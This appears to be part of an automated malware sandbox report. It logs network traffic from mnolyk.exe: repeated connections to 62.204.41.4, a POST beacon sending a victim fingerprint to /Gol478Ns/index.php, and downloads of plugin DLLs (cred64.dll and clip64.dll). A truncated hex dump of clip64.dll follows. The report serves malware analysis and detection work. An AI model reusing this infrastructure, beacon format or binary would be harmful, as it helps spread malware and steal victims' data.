                            Feb 8, 2023 17:40:18.236695051 CET805031762.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:18.240744114 CET5031780192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:18.342567921 CET5031780192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:18.343597889 CET5031880192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:18.403939962 CET805031862.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:18.403975010 CET805031762.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:18.404190063 CET5031780192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:18.404660940 CET5031880192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:18.404660940 CET5031880192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:18.464976072 CET805031862.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:18.467207909 CET805031862.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:18.467384100 CET5031880192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:18.601362944 CET5031880192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:18.602235079 CET5031980192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:18.661907911 CET805031862.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:18.662055969 CET5031880192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:18.662616968 CET805031962.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:18.662750959 CET5031980192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:18.663429022 CET5031980192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:18.724822044 CET805031962.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:18.728003025 CET805031962.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:18.729767084 CET5031980192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:18.842111111 CET5031980192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:18.842971087 CET5032080192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:18.905165911 CET805031962.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:18.905316114 CET5031980192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:18.907165051 CET805032062.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:18.910548925 CET5032080192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:18.911019087 CET5032080192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:18.972490072 CET805032062.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:18.974771023 CET805032062.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:18.974881887 CET5032080192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:19.081166983 CET5032080192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:19.082056046 CET5032180192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:19.142896891 CET805032062.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:19.143008947 CET5032080192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:19.143440008 CET805032162.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:19.143527031 CET5032180192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:19.144640923 CET5032180192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:19.206046104 CET805032162.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:19.208740950 CET805032162.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:19.208812952 CET5032180192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:19.311455011 CET5032180192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:19.312345028 CET5032280192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:19.375958920 CET805032162.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:19.376085997 CET5032180192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:19.377816916 CET805032262.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:19.377935886 CET5032280192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:19.378355026 CET5032280192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:19.440795898 CET805032262.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:19.442337036 CET805032262.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:19.442418098 CET5032280192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:19.546117067 CET5032280192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:19.546778917 CET5032380192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:19.608592987 CET805032262.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:19.608701944 CET5032280192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:19.610775948 CET805032362.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:19.610872984 CET5032380192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:19.611217976 CET5032380192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:19.678603888 CET805032362.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:19.678633928 CET805032362.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:19.678947926 CET5032380192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:19.801378012 CET5032380192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:19.802184105 CET5032480192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:19.865618944 CET805032462.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:19.865777969 CET5032480192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:19.866230965 CET5032480192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:19.868606091 CET805032362.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:19.868709087 CET5032380192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:19.928674936 CET805032462.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:19.932579041 CET805032462.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:19.932683945 CET5032480192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:20.045646906 CET5032480192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:20.046452045 CET5032580192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:20.109915972 CET805032462.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:20.109955072 CET805032562.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:20.109988928 CET5032480192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:20.110083103 CET5032580192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:20.110521078 CET5032580192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:20.174875021 CET805032562.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:20.176888943 CET805032562.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:20.176985025 CET5032580192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:20.282485008 CET5032580192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:20.283762932 CET5032680192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:20.343101978 CET805032562.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:20.343139887 CET805032662.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:20.343178988 CET5032580192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:20.343255043 CET5032680192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:20.344532967 CET5032680192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:20.403911114 CET805032662.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:20.406809092 CET805032662.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:20.406883955 CET5032680192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:20.514472961 CET5032680192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:20.515340090 CET5032780192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:20.576484919 CET805032662.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:20.576596022 CET5032680192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:20.577975035 CET805032762.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:20.578115940 CET5032780192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:20.585581064 CET5032780192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:20.648572922 CET805032762.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:20.650650024 CET805032762.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:20.650732994 CET5032780192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:20.767302036 CET5032780192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:20.768083096 CET5032880192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:20.827749968 CET805032762.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:20.827914953 CET5032780192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:20.830379009 CET805032862.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:20.830569983 CET5032880192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:20.835288048 CET5032880192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:20.897852898 CET805032862.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:20.900088072 CET805032862.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:20.900214911 CET5032880192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:21.049855947 CET5032880192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:21.050714970 CET5032980192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:21.110069036 CET805032962.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:21.110173941 CET5032980192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:21.110663891 CET5032980192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:21.112519979 CET805032862.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:21.112588882 CET5032880192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:21.169764042 CET805032962.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:21.171921968 CET805032962.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:21.171998024 CET5032980192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:21.293888092 CET5032980192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:21.313484907 CET5033080192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:21.353593111 CET805032962.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:21.353705883 CET5032980192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:21.372837067 CET805033062.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:21.374742985 CET5033080192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:21.380450964 CET5033080192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:21.442619085 CET805033062.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:21.444879055 CET805033062.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:21.444984913 CET5033080192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:21.568444967 CET5033080192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:21.569298983 CET5033180192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:21.628005028 CET805033062.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:21.629863024 CET805033162.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:21.629959106 CET5033080192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:21.630008936 CET5033180192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:21.630470037 CET5033180192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:21.690939903 CET805033162.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:21.692974091 CET805033162.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:21.693077087 CET5033180192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:21.796171904 CET5033180192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:21.797084093 CET5033280192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:21.857016087 CET805033162.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:21.858306885 CET805033262.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:21.858454943 CET5033180192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:21.858515024 CET5033280192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:21.859052896 CET5033280192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:21.920351982 CET805033262.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:21.930166006 CET805033262.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:21.930340052 CET5033280192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:22.045533895 CET5033280192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:22.046416998 CET5033380192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:22.109668970 CET805033262.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:22.109813929 CET5033280192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:22.110344887 CET805033362.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:22.110440969 CET5033380192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:22.114217043 CET5033380192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:22.176536083 CET805033362.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:22.179193020 CET805033362.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:22.179292917 CET5033380192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:22.299962997 CET5033380192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:22.301100016 CET5033480192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:22.361592054 CET805033362.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:22.361660004 CET805033462.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:22.361759901 CET5033380192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:22.361846924 CET5033480192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:22.362338066 CET5033480192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:22.424876928 CET805033462.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:22.427120924 CET805033462.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:22.427303076 CET5033480192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:22.536845922 CET5033480192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:22.538080931 CET5033580192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:22.597698927 CET805033462.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:22.597800970 CET5033480192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:22.599387884 CET805033562.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:22.599489927 CET5033580192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:22.600565910 CET5033580192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:22.662142992 CET805033562.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:22.665425062 CET805033562.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:22.665592909 CET5033580192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:22.779998064 CET5033580192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:22.780585051 CET5033680192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:22.841028929 CET805033662.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:22.841265917 CET5033680192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:22.841423988 CET805033562.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:22.841505051 CET5033580192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:22.842206955 CET5033680192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:22.902735949 CET805033662.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:22.905479908 CET805033662.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:22.905664921 CET5033680192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:23.019259930 CET5033680192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:23.020145893 CET5033780192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:23.081918955 CET805033662.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:23.082015038 CET5033680192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:23.084630013 CET805033762.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:23.084733009 CET5033780192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:23.085155964 CET5033780192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:23.149019957 CET805033762.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:23.153053045 CET805033762.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:23.153177977 CET5033780192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:23.268783092 CET5033780192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:23.269659042 CET5033880192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:23.332777023 CET805033862.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:23.332958937 CET5033880192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:23.333401918 CET5033880192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:23.333455086 CET805033762.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:23.333530903 CET5033780192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:23.393723965 CET805033862.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:23.396606922 CET805033862.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:23.396692991 CET5033880192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:23.498887062 CET5033880192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:23.499696016 CET5033980192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:23.559346914 CET805033862.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:23.559479952 CET5033880192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:23.559973955 CET805033962.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:23.560065985 CET5033980192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:23.560898066 CET5033980192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:23.625422955 CET805033962.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:23.628093004 CET805033962.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:23.628153086 CET5033980192.168.2.462.204.41.4
                            • 62.204.41.4
                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            0192.168.2.44969562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:37:24.659550905 CET92OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:24.723897934 CET93INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:24 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            1192.168.2.44969662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:37:24.664385080 CET93OUTGET /Gol478Ns/Plugins/cred64.dll HTTP/1.1
                            Host: 62.204.41.4
                            Feb 8, 2023 17:37:24.726803064 CET93INHTTP/1.1 404 Not Found
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:24 GMT
                            Content-Type: text/html
                            Content-Length: 162
                            Connection: keep-alive
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>
                            Feb 8, 2023 17:37:24.754415035 CET94OUTGET /Gol478Ns/Plugins/clip64.dll HTTP/1.1
                            Host: 62.204.41.4
                            Feb 8, 2023 17:37:24.817105055 CET95INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:24 GMT
                            Content-Type: application/octet-stream
                            Content-Length: 91136
                            Last-Modified: Fri, 03 Feb 2023 17:19:21 GMT
                            Connection: keep-alive
                            ETag: "63dd4219-16400"
                            Accept-Ranges: bytes
                            Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 07 18 8f 2c 43 79 e1 7f 43 79 e1 7f 43 79 e1 7f 18 11 e2 7e 49 79 e1 7f 18 11 e4 7e cb 79 e1 7f 18 11 e5 7e 51 79 e1 7f 96 14 e5 7e 4c 79 e1 7f 96 14 e2 7e 52 79 e1 7f 96 14 e4 7e 62 79 e1 7f 18 11 e0 7e 46 79 e1 7f 43 79 e0 7f 19 79 e1 7f d8 17 e8 7e 40 79 e1 7f d8 17 e1 7e 42 79 e1 7f d8 17 1e 7f 42 79 e1 7f d8 17 e3 7e 42 79 e1 7f 52 69 63 68 43 79 e1 7f 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 d4 38 dd 63 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 18 00 de 00 00 00 8c 00 00 00 00 00 00 00 3e 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 b0 01 00 00 04 00 00 00 00 00 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 a0 4a 01 00 9c 00 00 00 3c 4b 01 00 3c 00 00 00 00 80 01 00 f8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 01 00 54 10 00 00 20 3f 01 00 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 3f 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 2c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 56 dd 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 ee 61 00 00 00 f0 00 00 00 62 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 14 00 00 00 60 01 00 00 0c 00 00 00 44 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f8 00 00 00 00 80 01 00 00 02 00 00 00 50 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 54 10 00 00 00 90 01 00 00 12 00 00 00 52 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                            Data Ascii: MZ@!L!This program cannot be run in DOS mode.$,CyCyCy~Iy~y~Qy~Ly~Ry~by~FyCyy~@y~ByBy~ByRichCyPEL8c!>@J<K<T ?p?@,.textV `.rdataab@@.dataD`D@.rsrcP@@.relocTR@B
                            Feb 8, 2023 17:37:24.817138910 CET96INData Raw: 00 00 00 00 6a 20 68 a8 3c 01 10 b9 70 68 01 10 e8 3f 23 00 00 68 00 ea 00 10 e8 8c 2a 00 00 59 c3 cc cc cc 6a 38 68 cc 3c 01 10 b9 88 68 01 10 e8 1f 23 00 00 68 60 ea 00 10 e8 6c 2a 00 00 59 c3 cc cc cc 6a 38 68 cc 3c 01 10 b9 a0 68 01 10 e8 ff
                            Data Ascii: j h<ph?#h*Yj8h<h#h`l*Yj8h<h"hL*Yj8h<h"h ,*Yj8h=h"h*Yj0hD=h"h)Yj0hx=i"h@)Yhh=i
                            Feb 8, 2023 17:37:24.817173958 CET98INData Raw: 7d f0 10 8d 45 dc 0f 43 45 dc 0f be 04 18 8b 04 81 83 f8 ff 74 27 c1 e6 06 03 f0 83 c7 06 78 18 8b cf 8b c6 d3 f8 8b 4d f4 50 e8 1f 1b 00 00 8b 55 ec 83 ef 08 8b 4d f8 43 3b da 72 c2 8b 45 f8 85 c0 74 0e 68 00 04 00 00 50 e8 f0 21 00 00 83 c4 08
                            Data Ascii: }ECEt'xMPUMC;rEthP!Ur(MBrI#+wVRQ!UEEEr(MBrI#+wRQ~!E_^[]GU4E0SVW3E
                            Feb 8, 2023 17:37:24.817205906 CET99INData Raw: 23 52 51 e8 31 1d 00 00 83 c4 08 33 f6 e9 74 ff ff ff 52 51 e8 20 1d 00 00 83 c4 08 5f 8b c6 5e 8b e5 5d c3 e8 3f 43 00 00 e8 4a 1a 00 00 cc cc cc cc cc cc cc cc cc cc 55 8b ec 51 8b 45 18 8b 55 1c 8b 4d 08 56 85 c0 0f 84 82 00 00 00 53 40 57 50
                            Data Ascii: #RQ13tRQ _^]?CJUQEUMVS@WP] M}CM+IDuNFu+FVjVSWP5WjWj UM_[^r%BrI#+wRQ
                            Feb 8, 2023 17:37:24.817240953 CET100INData Raw: 10 72 2d 8b 4c 24 40 42 8b c1 81 fa 00 10 00 00 72 14 8b 49 fc 83 c2 23 2b c1 83 c0 fc 83 f8 1f 0f 87 f8 10 00 00 52 51 e8 06 18 00 00 83 c4 08 8b 0d e4 68 01 10 83 f9 10 72 2e a1 d0 68 01 10 41 81 f9 00 10 00 00 72 16 8b 50 fc 83 c1 23 2b c2 83
                            Data Ascii: r-L$@BrI#+RQhr.hArP#+QPD$`hhL$Dh~D$tfhQT$DL$dT$Xr-L$@BrI#+PRQ^hr.hArP
                            Feb 8, 2023 17:37:24.817279100 CET102INData Raw: 00 00 8a 41 02 3a 42 02 75 0f 83 7c 24 1c ff 74 7b 8a 41 03 3a 42 03 74 73 83 ff 25 73 6e 83 ce 02 c7 44 24 50 00 00 00 00 b9 01 00 00 00 89 74 24 18 3b f9 c7 44 24 54 0f 00 00 00 8d 44 24 20 c6 44 24 40 00 0f 42 cf 83 7c 24 34 10 51 0f 43 44 24
                            Data Ascii: A:Bu|$t{A:Bts%snD$Pt$;D$TD$ D$@B|$4QCD$$L$DPT$TD$@L$@C|$Pu81u|$0D$|$0L$@T$TD$D$t9D$r-BrI#+LRQZD$ T$tD$r-L$`B
                            Feb 8, 2023 17:37:24.817317963 CET103INData Raw: 6c 8b c7 83 e8 04 89 44 24 1c 72 19 8b 01 3b 02 75 1c 8b 44 24 1c 83 c1 04 83 c2 04 83 e8 04 89 44 24 1c 73 e7 83 f8 fc 0f 84 bd 00 00 00 8a 01 3a 02 75 39 83 7c 24 1c fd 0f 84 ac 00 00 00 8a 41 01 3a 42 01 75 26 83 7c 24 1c fe 0f 84 99 00 00 00
